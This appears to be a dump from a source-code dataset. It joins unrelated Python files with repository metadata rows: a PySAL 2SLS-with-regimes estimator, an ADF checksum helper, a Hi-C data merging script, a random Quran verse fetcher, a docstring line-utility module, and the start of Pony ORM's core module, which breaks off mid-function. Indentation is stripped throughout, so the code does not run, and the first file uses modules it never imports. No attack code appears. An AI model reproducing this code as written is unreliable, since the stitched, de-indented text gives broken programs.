from .utils import sphstack, set_warn, RegressionProps_basic, spdot, sphstack
from .twosls import BaseTSLS
from .robust import hac_multi
from . import summary_output as SUMMARY
from platform import system
"""
Two-stage Least Squares estimation with regimes.
"""
__author__ = "Luc Anselin luc.anselin@asu.edu, Pedro V. Amaral pedro.amaral@asu.edu, David C. Folch david.folch@asu.edu"
class TSLS_Regimes(BaseTSLS, REGI.Regimes_Frame):
"""
Two stage least squares (2SLS) with regimes
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
q : array
Two dimensional array with n rows and one column for each
external exogenous variable to use as instruments (note:
this should not contain any variables from x)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: ['one', 'many']
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime (default)
cols2regi : list, 'all'
Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all' (default), all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
robust : string
If 'white', then a White consistent estimator of the
variance-covariance matrix is given.
If 'hac', then a HAC consistent estimator of the
variance-covariance matrix is given.
If 'ogmm', then Optimal GMM is used to estimate
betas and the variance-covariance matrix.
Default set to None.
gwk : pysal W object
Kernel spatial weights needed for HAC estimation. Note:
matrix must have ones along the main diagonal.
sig2n_k : boolean
If True, then use n-k to estimate sigma^2. If False, use n.
vm : boolean
If True, include variance-covariance matrix in summary
cores : boolean
Specifies if multiprocessing is to be used
Default: no multiprocessing, cores = False
Note: Multiprocessing may not work on all platforms.
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
betas : array
kx1 array of estimated coefficients
u : array
nx1 array of residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
q : array
Two dimensional array with n rows and one column for each
external exogenous variable used as instruments
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
vm : array
Variance covariance matrix (kxk)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: [False, 'one', 'many']
Ignored if regimes=False. Constant option for regimes.
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime
cols2regi : list, 'all'
Ignored if regimes=False. Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all', all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
kr : int
Number of variables/columns to be "regimized" or subject
to change by regime. These will result in one parameter
estimate by regime for each variable (i.e. nr parameters per
variable)
kf : int
Number of variables/columns to be considered fixed or
global across regimes and hence only obtain one parameter
estimate
nr : int
Number of different regimes in the 'regimes' list
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
multi : dictionary
Only available when multiple regressions are estimated,
i.e. when regime_err_sep=True and no variable is fixed
across regimes.
Contains all attributes of each individual regression
Examples
--------
We first need to import the needed modules, namely numpy to convert the
data we read into arrays that ``spreg`` understands and ``pysal`` to
perform all the analysis.
>>> import numpy as np
>>> import pysal.lib
Open data on NCOVR US County Homicides (3085 areas) using pysal.lib.io.open().
This is the DBF associated with the NAT shapefile. Note that
pysal.lib.io.open() also reads data in CSV format; since the actual class
requires data to be passed in as numpy arrays, the user can read their
data in using any method.
>>> db = pysal.lib.io.open(pysal.lib.examples.get_path("NAT.dbf"),'r')
Extract the HR90 column (homicide rates in 1990) from the DBF file and make it the
dependent variable for the regression. Note that PySAL requires this to be
an numpy array of shape (n, 1) as opposed to the also common shape of (n, )
that other packages accept.
>>> y_var = 'HR90'
>>> y = np.array([db.by_col(y_var)]).reshape(3085,1)
Extract UE90 (unemployment rate) and PS90 (population structure) vectors from
the DBF to be used as independent variables in the regression. Other variables
can be inserted by adding their names to x_var, such as x_var = ['Var1','Var2','...]
Note that PySAL requires this to be an nxj numpy array, where j is the
number of independent variables (not including a constant). By default
this model adds a vector of ones to the independent variables passed in.
>>> x_var = ['PS90','UE90']
>>> x = np.array([db.by_col(name) for name in x_var]).T
In this case we consider RD90 (resource deprivation) as an endogenous regressor.
We tell the model that this is so by passing it in a different parameter
from the exogenous variables (x).
>>> yd_var = ['RD90']
>>> yd = np.array([db.by_col(name) for name in yd_var]).T
Because we have endogenous variables, to obtain a correct estimate of the
model, we need to instrument for RD90. We use FP89 (families below poverty)
for this and hence put it in the instruments parameter, 'q'.
>>> q_var = ['FP89']
>>> q = np.array([db.by_col(name) for name in q_var]).T
The different regimes in this data are given according to the North and
South dummy (SOUTH).
>>> r_var = 'SOUTH'
>>> regimes = db.by_col(r_var)
Since we want to perform tests for spatial dependence, we need to specify
the spatial weights matrix that includes the spatial configuration of the
observations into the error component of the model. To do that, we can open
an already existing gal file or create a new one. In this case, we will
create one from ``NAT.shp``.
>>> w = pysal.lib.weights.Rook.from_shapefile(pysal.lib.examples.get_path("NAT.shp"))
Unless there is a good reason not to do it, the weights have to be
row-standardized so every row of the matrix sums to one. Among other
things, this allows to interpret the spatial lag of a variable as the
average value of the neighboring observations. In PySAL, this can be
easily performed in the following way:
>>> w.transform = 'r'
We can now run the regression and then have a summary of the output
by typing: model.summary
Alternatively, we can just check the betas and standard errors of the
parameters:
>>> tslsr = TSLS_Regimes(y, x, yd, q, regimes, w=w, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var, name_yend=yd_var, name_q=q_var, name_regimes=r_var, name_ds='NAT', name_w='NAT.shp')
>>> tslsr.betas
array([[ 3.66973562],
[ 1.06950466],
[ 0.14680946],
[ 2.45864196],
[ 9.55873243],
[ 1.94666348],
[-0.30810214],
[ 3.68718119]])
>>> np.sqrt(tslsr.vm.diagonal())
array([ 0.38389901, 0.09963973, 0.04672091, 0.22725012, 0.49181223,
0.19630774, 0.07784587, 0.25529011])
"""
def __init__(self, y, x, yend, q, regimes,
w=None, robust=None, gwk=None, sig2n_k=True,
spat_diag=False, vm=False, constant_regi='many',
cols2regi='all', regime_err_sep=True, name_y=None, name_x=None,
cores=False, name_yend=None, name_q=None, name_regimes=None,
name_w=None, name_gwk=None, name_ds=None, summ=True):
n = USER.check_arrays(y, x)
USER.check_y(y, n)
USER.check_weights(w, y)
USER.check_robust(robust, gwk)
USER.check_spat_diag(spat_diag, w)
self.constant_regi = constant_regi
self.cols2regi = cols2regi
self.name_ds = USER.set_name_ds(name_ds)
self.name_regimes = USER.set_name_ds(name_regimes)
self.name_w = USER.set_name_w(name_w, w)
self.name_gwk = USER.set_name_w(name_gwk, gwk)
self.name_y = USER.set_name_y(name_y)
name_yend = USER.set_name_yend(name_yend, yend)
name_q = USER.set_name_q(name_q, q)
self.name_x_r = USER.set_name_x(name_x, x) + name_yend
self.n = n
cols2regi = REGI.check_cols2regi(
constant_regi, cols2regi, x, yend=yend, add_cons=False)
self.regimes_set = REGI._get_regimes_set(regimes)
self.regimes = regimes
USER.check_regimes(self.regimes_set, self.n, x.shape[1])
if regime_err_sep == True and robust == 'hac':
set_warn(
self, "Error by regimes is incompatible with HAC estimation for 2SLS models. Hence, the error by regimes has been disabled for this model.")
regime_err_sep = False
self.regime_err_sep = regime_err_sep
if regime_err_sep == True and set(cols2regi) == set([True]) and constant_regi == 'many':
name_x = USER.set_name_x(name_x, x)
self.y = y
regi_ids = dict(
(r, list(np.where(np.array(regimes) == r)[0])) for r in self.regimes_set)
self._tsls_regimes_multi(x, yend, q, w, regi_ids, cores,
gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q)
else:
name_x = USER.set_name_x(name_x, x, constant=True)
q, self.name_q = REGI.Regimes_Frame.__init__(self, q,
regimes, constant_regi=None, cols2regi='all', names=name_q)
x, self.name_x = REGI.Regimes_Frame.__init__(self, x,
regimes, constant_regi, cols2regi=cols2regi, names=name_x)
yend, self.name_yend = REGI.Regimes_Frame.__init__(self, yend,
regimes, constant_regi=None,
cols2regi=cols2regi, yend=True, names=name_yend)
if regime_err_sep == True and robust == None:
robust = 'white'
BaseTSLS.__init__(self, y=y, x=x, yend=yend, q=q,
robust=robust, gwk=gwk, sig2n_k=sig2n_k)
self.title = "TWO STAGE LEAST SQUARES - REGIMES"
if robust == 'ogmm':
_optimal_weight(self, sig2n_k)
self.name_z = self.name_x + self.name_yend
self.name_h = USER.set_name_h(self.name_x, self.name_q)
self.chow = REGI.Chow(self)
self.robust = USER.set_robust(robust)
if summ:
SUMMARY.TSLS(
reg=self, vm=vm, w=w, spat_diag=spat_diag, regimes=True)
def _tsls_regimes_multi(self, x, yend, q, w, regi_ids, cores,
gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q):
results_p = {}
"""
for r in self.regimes_set:
if system() != 'Windows':
is_win = True
results_p[r] = _work(*(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
else:
pool = mp.Pool(cores)
results_p[r] = pool.apply_async(_work,args=(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
is_win = False
"""
for r in self.regimes_set:
if cores:
pool = mp.Pool(None)
results_p[r] = pool.apply_async(_work, args=(
self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k, self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
else:
results_p[r] = _work(*(self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k,
self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
self.kryd = 0
self.kr = x.shape[1] + yend.shape[1] + 1
self.kf = 0
self.nr = len(self.regimes_set)
self.vm = np.zeros((self.nr * self.kr, self.nr * self.kr), float)
self.betas = np.zeros((self.nr * self.kr, 1), float)
self.u = np.zeros((self.n, 1), float)
self.predy = np.zeros((self.n, 1), float)
"""
if not is_win:
pool.close()
pool.join()
"""
if cores:
pool.close()
pool.join()
results = {}
self.name_y, self.name_x, self.name_yend, self.name_q, self.name_z, self.name_h = [
], [], [], [], [], []
counter = 0
for r in self.regimes_set:
"""
if is_win:
results[r] = results_p[r]
else:
results[r] = results_p[r].get()
"""
if not cores:
results[r] = results_p[r]
else:
results[r] = results_p[r].get()
self.vm[(counter * self.kr):((counter + 1) * self.kr),
(counter * self.kr):((counter + 1) * self.kr)] = results[r].vm
self.betas[
(counter * self.kr):((counter + 1) * self.kr), ] = results[r].betas
self.u[regi_ids[r], ] = results[r].u
self.predy[regi_ids[r], ] = results[r].predy
self.name_y += results[r].name_y
self.name_x += results[r].name_x
self.name_yend += results[r].name_yend
self.name_q += results[r].name_q
self.name_z += results[r].name_z
self.name_h += results[r].name_h
counter += 1
self.multi = results
self.hac_var = sphstack(x, q)
if robust == 'hac':
hac_multi(self, gwk)
if robust == 'ogmm':
set_warn(
self, "Residuals treated as homoskedastic for the purpose of diagnostics.")
self.chow = REGI.Chow(self)
if spat_diag:
self._get_spat_diag_props(results, regi_ids, x, yend, q)
SUMMARY.TSLS_multi(
reg=self, multireg=self.multi, vm=vm, spat_diag=spat_diag, regimes=True, w=w)
def _get_spat_diag_props(self, results, regi_ids, x, yend, q):
self._cache = {}
x = USER.check_constant(x)
x = REGI.regimeX_setup(
x, self.regimes, [True] * x.shape[1], self.regimes_set)
self.z = sphstack(x, REGI.regimeX_setup(
yend, self.regimes, [True] * yend.shape[1], self.regimes_set))
self.h = sphstack(
x, REGI.regimeX_setup(q, self.regimes, [True] * q.shape[1], self.regimes_set))
hthi = np.linalg.inv(spdot(self.h.T, self.h))
zth = spdot(self.z.T, self.h)
self.varb = np.linalg.inv(spdot(spdot(zth, hthi), zth.T))
def _work(y, x, w, regi_ids, r, yend, q, robust, sig2n_k, name_ds, name_y, name_x, name_yend, name_q, name_w, name_regimes):
y_r = y[regi_ids[r]]
x_r = x[regi_ids[r]]
yend_r = yend[regi_ids[r]]
q_r = q[regi_ids[r]]
x_constant = USER.check_constant(x_r)
if robust == 'hac' or robust == 'ogmm':
robust2 = None
else:
robust2 = robust
model = BaseTSLS(
y_r, x_constant, yend_r, q_r, robust=robust2, sig2n_k=sig2n_k)
model.title = "TWO STAGE LEAST SQUARES ESTIMATION - REGIME %s" % r
if robust == 'ogmm':
_optimal_weight(model, sig2n_k, warn=False)
model.robust = USER.set_robust(robust)
model.name_ds = name_ds
model.name_y = '%s_%s' % (str(r), name_y)
model.name_x = ['%s_%s' % (str(r), i) for i in name_x]
model.name_yend = ['%s_%s' % (str(r), i) for i in name_yend]
model.name_z = model.name_x + model.name_yend
model.name_q = ['%s_%s' % (str(r), i) for i in name_q]
model.name_h = model.name_x + model.name_q
model.name_w = name_w
model.name_regimes = name_regimes
if w:
w_r, warn = REGI.w_regime(w, regi_ids[r], r, transform=True)
set_warn(model, warn)
model.w = w_r
return model
def _optimal_weight(reg, sig2n_k, warn=True):
try:
Hu = reg.h.toarray() * reg.u ** 2
except:
Hu = reg.h * reg.u ** 2
if sig2n_k:
S = spdot(reg.h.T, Hu, array_out=True) / (reg.n - reg.k)
else:
S = spdot(reg.h.T, Hu, array_out=True) / reg.n
Si = np.linalg.inv(S)
ZtH = spdot(reg.z.T, reg.h)
ZtHSi = spdot(ZtH, Si)
fac2 = np.linalg.inv(spdot(ZtHSi, ZtH.T, array_out=True))
fac3 = spdot(ZtHSi, spdot(reg.h.T, reg.y), array_out=True)
betas = np.dot(fac2, fac3)
if sig2n_k:
vm = fac2 * (reg.n - reg.k)
else:
vm = fac2 * reg.n
RegressionProps_basic(reg, betas=betas, vm=vm, sig2=False)
reg.title += " (Optimal-Weighted GMM)"
if warn:
set_warn(
reg, "Residuals treated as homoskedastic for the purpose of diagnostics.")
return
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
if __name__ == '__main__':
_test()
import numpy as np
import pysal.lib
db = pysal.lib.io.open(pysal.lib.examples.get_path('NAT.dbf'), 'r')
y_var = 'HR60'
y = np.array([db.by_col(y_var)]).T
x_var = ['PS60', 'DV60', 'RD60']
x = np.array([db.by_col(name) for name in x_var]).T
yd_var = ['UE60']
yd = np.array([db.by_col(name) for name in yd_var]).T
q_var = ['FP59', 'MA60']
q = np.array([db.by_col(name) for name in q_var]).T
r_var = 'SOUTH'
regimes = db.by_col(r_var)
tslsr = TSLS_Regimes(y, x, yd, q, regimes, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var,
name_yend=yd_var, name_q=q_var, name_regimes=r_var, cols2regi=[
False, True, True, True],
sig2n_k=False)
print(tslsr.summary)
| 44.959302 | 207 | 0.579766 |
2fcc71ca9e1a206bf5dca1a1b7d486275dcd7bbd | 299 | py | Python | adf2dms/checksum.py | dlitz/adf2dms | 8adfe6acfdc9f18f3627e04eb1d1f798c112f3da | [
"MIT"
] | null | null | null | adf2dms/checksum.py | dlitz/adf2dms | 8adfe6acfdc9f18f3627e04eb1d1f798c112f3da | [
"MIT"
] | null | null | null | adf2dms/checksum.py | dlitz/adf2dms | 8adfe6acfdc9f18f3627e04eb1d1f798c112f3da | [
"MIT"
] | null | null | null | # dlitz 2022
from crccheck.crc import Crc16Arc as _Crc16Arc
def checksum(data):
it = iter(data)
result = 0
while True:
try:
a = next(it)
except StopIteration:
break
result = (result + a) & 0xffff
return result
crc16 = _Crc16Arc.calc
| 18.6875 | 46 | 0.578595 |
8a3323862505d83dabe3b974d634f1d8a4ce2c38 | 7,986 | py | Python | examples/filteringManyDatasets/mergeDatasets2011.py | mirnylab/hiclib-legacy | 518546e41987dca8a40f45ddc63601a5aaf46bfa | [
"MIT"
] | 10 | 2020-02-18T04:23:47.000Z | 2022-03-21T05:15:45.000Z | examples/filteringManyDatasets/mergeDatasets2011.py | mirnylab/hiclib-legacy | 518546e41987dca8a40f45ddc63601a5aaf46bfa | [
"MIT"
] | 1 | 2020-03-03T09:26:40.000Z | 2020-06-23T12:36:00.000Z | examples/filteringManyDatasets/mergeDatasets2011.py | mirnylab/hiclib-legacy | 518546e41987dca8a40f45ddc63601a5aaf46bfa | [
"MIT"
] | 3 | 2020-08-15T13:49:09.000Z | 2021-01-20T02:27:00.000Z | """
.. note::
This is the old version of the script from 2011
This example script does the following:
-Loads individual files from the location defined by source(ID)
-Parses individual files in memory (inMemory = True in "for onename in in_files))
-If your system does not have enough memory, you might need to switch to hdf5 here.
-Merges files corresponding to the same experiment together, on the HDD.
-Filters datasets, builds heatmaps
-Combines multiple replicas of the same experiment together, builds heatmaps
--Locations of individual files are defined by source(ID) function.
--Datasets are defined in the datasets.tsv file
--genome is defined by genomeFolder function, and workingGenome identifyer
--output files are arranged to folders named by their workingGenome IDs
Warnings:
Running this over NFS might cause unexpected slow-downs because NFS is
unhappy with repeated read/write cycles to the same file
You could do entire thing in memory, if you have RAM or your datasets are small.
Actually, using HDF5 is then equivalent to storing compressed data in RAM,
and might be in fact pretty fast.
"""
from hiclib.fragmentHiC import HiCdataset
import os
def genomeFolder(name):
return os.path.join("/home/magus/HiC2011/data", name) # Fetch genome folder by genome name
def source(ID):
return ID
return "/net/tamm/home/magus/gigareadHiC/data/%s.fastq.hdf5" % ID
def refineDataset(filenames, create=True, delete=True, parseInMemory=True):
"""
Parameters
----------
filenames[0] is a list of filenames of incoming files
filenames[1] is a folder for outgoing file
filenames[2] is a working genome name, which is also the name of output directory
create : bool, optional
If True, parse each file.
If False, assume that files were already parsed
(e.g. if you are just playing around with filtering parameters)
delete : bool, optional
If True, delete parsed files after merging.
Man, these files may be huge... if you don't have a 10TB RAID, this may be useful.
parseInMemory : bool, optional
Perform parsing input files in memory.
"""
in_files = filenames[0]
out_file = filenames[1]
workingGenome = filenames[2]
if os.path.exists(workingGenome) == False:
try:
os.mkdir(workingGenome)
except:
print "Cannot create working directory"
exit()
if create == True: # if we need to parse the input files (.hdf5 from mapping).
for onename in in_files:
#Parsing individual files
if not os.path.exists(source(onename)):
raise StandardError("path not found: %s" % onename)
if parseInMemory == True:
#create dataset in memory, parse and then save to destination
TR = HiCdataset("bla", genome=genomeFolder(workingGenome),
maximumMoleculeLength=500, override=True,
inMemory=True) # remove inMemory if you don't have enough RAM
TR.parseInputData(dictLike=source(onename))
TR.save(onename + "_parsed.frag")
else:
#Create dataset at destination, parse on HDD, then no need to save.
TR = HiCdataset(onename + "_parsed.frag",
genome=genomeFolder(workingGenome),
maximumMoleculeLength=500, override=True)
TR.parseInputData(dictLike=source(onename))
"Merging files alltogether, applying filters"
TR = HiCdataset(out_file + "_merged.frag",
genome=genomeFolder(workingGenome),
override=True)
TR.merge([i + "_parsed.frag" for i in in_files])
#Merge in all parsed files from one experiment
if delete == True: # cleaning up parsed files
for delFile in [i + "_parsed.frag" for i in in_files]:
os.remove(delFile)
TR.flush()
"Now opening new dataset for refined data, and performing all the filtering "
TR = HiCdataset(out_file + "_refined.frag",
genome=genomeFolder(workingGenome),
override=True)
TR.load(out_file + "_merged.frag")
#----------------------------Set of filters applied -------------
TR.filterRsiteStart(offset=5)
TR.filterDuplicates()
#TR.save(out_file+".dat")
TR.filterLarge()
TR.filterExtreme(cutH=0.005, cutL=0)
#------------------------End set of filters applied----------
else:
#If merging & filters has already been done, just load files
TR = HiCdataset(out_file + "_working.frag",
override=True, genome=genomeFolder(workingGenome))
TR.load(out_file + "_refined.frag")
print "----->Building Raw heatmap at two resolutions"
TR.printStats()
TR.saveHeatmap(out_file + "-200k.hm", 200000)
TR.saveHeatmap(out_file + "-500k.hm", 500000)
TR.saveHeatmap(out_file + "-1M.hm", 1000000)
TR.saveHeatmap(out_file + "-2M.hm", 2000000)
print "----->Building RB heatmap"
TR = HiCdataset(out_file + "_breaks.frag", genome=genomeFolder(
workingGenome), override=True)
TR.load(out_file + "_refined.frag")
TR.maskFilter((TR.dists1 > TR.maximumMoleculeLength) + (TR.dists2 >
TR.maximumMoleculeLength) * TR.DS)
TR.printStats()
TR.saveHeatmap(out_file + "-200k-breaks.hm", 200000)
TR.saveHeatmap(out_file + "-500k-breaks.hm", 500000)
TR.saveHeatmap(out_file + "-1M-breaks.hm", 1000000)
TR.saveHeatmap(out_file + "-2M-breaks.hm", 2000000)
#This code is actually parsing datasets.tsv file
dataFiles = open("datasets.tsv").readlines()
dataFiles = [i.split() for i in dataFiles if (len(i) > 3) and (i[0] != "#")]
assert False not in [len(i) == 4 for i in dataFiles]
experimentNames = set((i[1], i[2], i[3]) for i in dataFiles)
byExperiment = []
newExperimentNames = []
for experiment in experimentNames:
workingGenome = experiment[2]
filenames = [i[0] for i in dataFiles if (i[1], i[2], i[3]) == experiment]
outName = str(experiment[0]) + "-" + str(experiment[1])
byExperiment.append(
(filenames, os.path.join(workingGenome, outName), workingGenome))
newExperimentNames.append((experiment[0], os.path.join(
workingGenome, outName), workingGenome))
#Now running refineDataset for each experiment
for i in byExperiment:
refineDataset(i, create=True, delete=True)
#Now merging different experiments alltogether
experiments = set([(i[0], i[2]) for i in newExperimentNames])
for experiment in experiments:
workingGenome = experiment[1]
myExperimentNames = [i[1] + "_refined.frag" for i in newExperimentNames if i[0] == experiment[0]]
assert len(myExperimentNames) > 0
if len(myExperimentNames) > 1:
TR = HiCdataset(os.path.join(workingGenome, "%s-all_refined.frag" %
experiment[0]), genome=genomeFolder(workingGenome))
TR.merge(myExperimentNames)
TR.saveHeatmap(os.path.join(
workingGenome, "%s-all-100k.hm" % experiment[0]), 100000)
TR.saveHeatmap(os.path.join(
workingGenome, "%s-all-200k.hm" % experiment[0]), 200000)
TR.saveHeatmap(os.path.join(
workingGenome, "%s-all-500k.hm" % experiment[0]), 500000)
TR.saveHeatmap(os.path.join(
workingGenome, "%s-all-1M.hm" % experiment[0]), 1000000)
#map(refine_paper,
# [((source("SRR027961"),
# source("SRR027960")), os.path.join(workingGenome, "GM-NcoI-%s" % workingGenome ),"NcoI"),
# ((source("SRR027956"),
# source("SRR027957"),
# source("SRR027958"),
# source("SRR027959")), os.path.join(workingGenome, "GM-HindIII-%s" % workingGenome ),"HindIII")])
| 40.538071 | 106 | 0.63436 |
692f93693a695e57f405ee61f591df02db301a20 | 363 | py | Python | GettingAyah.py | Shalash96/PyQuran | da893b73779a342caae0defc8398e27e5744ff7d | [
"MIT"
] | 2 | 2020-09-27T22:42:42.000Z | 2020-10-02T18:50:29.000Z | GettingAyah.py | Shalash96/PyQuran | da893b73779a342caae0defc8398e27e5744ff7d | [
"MIT"
] | null | null | null | GettingAyah.py | Shalash96/PyQuran | da893b73779a342caae0defc8398e27e5744ff7d | [
"MIT"
] | null | null | null | import requests
import random
def GettingAyah():
"""The code used to get an Ayah from the Quran every fixed time"""
while True:
ayah = random.randint(1, 6237)
url = f'http://api.alquran.cloud/v1/ayah/{ayah}'
res = requests.get(url)
if len(res.json()['data']['text']) <= 280:
return res.json()['data']['text']
| 27.923077 | 70 | 0.586777 |
819681fd8494bd65670754e92c213d966a15c5ef | 2,856 | py | Python | docs/source/sphinxext/refactordoc/line_functions.py | mmckerns/enaml | ebf417b4dce9132bffa038a588ad90436a59d37e | [
"BSD-3-Clause"
] | 11 | 2015-03-14T14:30:51.000Z | 2022-03-15T13:01:44.000Z | docs/source/sphinxext/refactordoc/line_functions.py | mmckerns/enaml | ebf417b4dce9132bffa038a588ad90436a59d37e | [
"BSD-3-Clause"
] | 36 | 2015-02-20T00:56:53.000Z | 2020-12-04T10:02:14.000Z | docs/source/sphinxext/refactordoc/line_functions.py | mmckerns/enaml | ebf417b4dce9132bffa038a588ad90436a59d37e | [
"BSD-3-Clause"
] | 4 | 2015-01-27T01:56:14.000Z | 2021-02-23T07:21:20.000Z | # -*- coding: UTF-8 -*-
#------------------------------------------------------------------------------
# file: line_functions.py
# License: LICENSE.TXT
# Author: Ioannis Tziakos
#
# Copyright (c) 2011, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
#!/usr/bin/env python
import re
#------------------------------------------------------------------------------
# Precompiled regexes
#------------------------------------------------------------------------------
indent_regex = re.compile(r'\s+')
#------------------------------------------------------------------------------
# Functions to manage indention
#------------------------------------------------------------------------------
def add_indent(lines, indent=4):
""" Add spaces to indent a list of lines.
Arguments
---------
lines : list
The list of strings to indent.
indent : int
The number of spaces to add.
Returns
-------
lines : list
The indented strings (lines).
.. note:: Empty strings are not changed
"""
indent_str = ' ' * indent
output = []
for line in lines:
if is_empty(line):
output.append(line)
else:
output.append(indent_str + line)
return output
def remove_indent(lines):
""" Remove all indentation from the lines.
"""
return [line.lstrip() for line in lines]
def get_indent(line):
""" Return the indent portion of the line.
"""
indent = indent_regex.match(line)
if indent is None:
return ''
else:
return indent.group()
#------------------------------------------------------------------------------
# Functions to detect line type
#------------------------------------------------------------------------------
def is_empty(line):
return not line.strip()
#------------------------------------------------------------------------------
# Functions to adjust strings
#------------------------------------------------------------------------------
def fix_star(word):
return word.replace('*','\*')
def fix_backspace(word):
return word.replace('\\', '\\\\')
def replace_at(word, line, index):
""" Replace the text in-line.
The text in line is replaced (not inserted) with the word. The
replacement starts at the provided index. The result is cliped to
the input length
Arguments
---------
word : str
The text to copy into the line.
line : str
The line where the copy takes place.
index : int
The index to start coping.
Returns
-------
result : str
line of text with the text replaced.
"""
word_length = len(word)
result = line[:index] + word + line[(index + word_length):]
return result[:len(line)]
| 25.5 | 79 | 0.434524 |
b7c5bfa62a5872369c9d9a90100345866eb2b1b7 | 293,023 | py | Python | pony/orm/core.py | antlarr-suse/pony | f75afc222a9e49821752ca10fbca589234b56c31 | [
"Apache-2.0"
] | null | null | null | pony/orm/core.py | antlarr-suse/pony | f75afc222a9e49821752ca10fbca589234b56c31 | [
"Apache-2.0"
] | null | null | null | pony/orm/core.py | antlarr-suse/pony | f75afc222a9e49821752ca10fbca589234b56c31 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, print_function, division
from pony.py23compat import PY2, izip, imap, iteritems, itervalues, items_list, values_list, xrange, cmp, \
basestring, unicode, buffer, int_types, builtins, with_metaclass
import json, re, sys, types, datetime, logging, itertools, warnings, inspect
from operator import attrgetter, itemgetter
from itertools import chain, starmap, repeat
from time import time
from decimal import Decimal
from random import shuffle, randint, random
from threading import Lock, RLock, currentThread as current_thread, _MainThread
from contextlib import contextmanager
from collections import defaultdict
from hashlib import md5
from inspect import isgeneratorfunction
from functools import wraps
from pony.thirdparty.compiler import ast, parse
import pony
from pony import options
from pony.orm.decompiling import decompile
from pony.orm.ormtypes import LongStr, LongUnicode, numeric_types, RawSQL, normalize, Json, TrackedValue, QueryType
from pony.orm.asttranslation import ast2src, create_extractors, TranslationError
from pony.orm.dbapiprovider import (
DBAPIProvider, DBException, Warning, Error, InterfaceError, DatabaseError, DataError,
OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError
)
from pony import utils
from pony.utils import localbase, decorator, cut_traceback, cut_traceback_depth, throw, reraise, truncate_repr, \
get_lambda_args, pickle_ast, unpickle_ast, deprecated, import_module, parse_expr, is_ident, tostring, strjoin, \
between, concat, coalesce, HashableDict
__all__ = [
'pony',
'DBException', 'RowNotFound', 'MultipleRowsFound', 'TooManyRowsFound',
'Warning', 'Error', 'InterfaceError', 'DatabaseError', 'DataError', 'OperationalError',
'IntegrityError', 'InternalError', 'ProgrammingError', 'NotSupportedError',
'OrmError', 'ERDiagramError', 'DBSchemaError', 'MappingError', 'BindingError',
'TableDoesNotExist', 'TableIsNotEmpty', 'ConstraintError', 'CacheIndexError',
'ObjectNotFound', 'MultipleObjectsFoundError', 'TooManyObjectsFoundError', 'OperationWithDeletedObjectError',
'TransactionError', 'ConnectionClosedError', 'TransactionIntegrityError', 'IsolationError',
'CommitException', 'RollbackException', 'UnrepeatableReadError', 'OptimisticCheckError',
'UnresolvableCyclicDependency', 'UnexpectedError', 'DatabaseSessionIsOver',
'DatabaseContainsIncorrectValue', 'DatabaseContainsIncorrectEmptyValue',
'TranslationError', 'ExprEvalError', 'PermissionError',
'Database', 'sql_debug', 'set_sql_debug', 'sql_debugging', 'show',
'PrimaryKey', 'Required', 'Optional', 'Set', 'Discriminator',
'composite_key', 'composite_index',
'flush', 'commit', 'rollback', 'db_session', 'with_transaction',
'LongStr', 'LongUnicode', 'Json',
'select', 'left_join', 'get', 'exists', 'delete',
'count', 'sum', 'min', 'max', 'avg', 'group_concat', 'distinct',
'JOIN', 'desc', 'between', 'concat', 'coalesce', 'raw_sql',
'buffer', 'unicode',
'get_current_user', 'set_current_user', 'perm', 'has_perm',
'get_user_groups', 'get_user_roles', 'get_object_labels',
'user_groups_getter', 'user_roles_getter', 'obj_labels_getter'
]
suppress_debug_change = False
def sql_debug(value):
# todo: make sql_debug deprecated
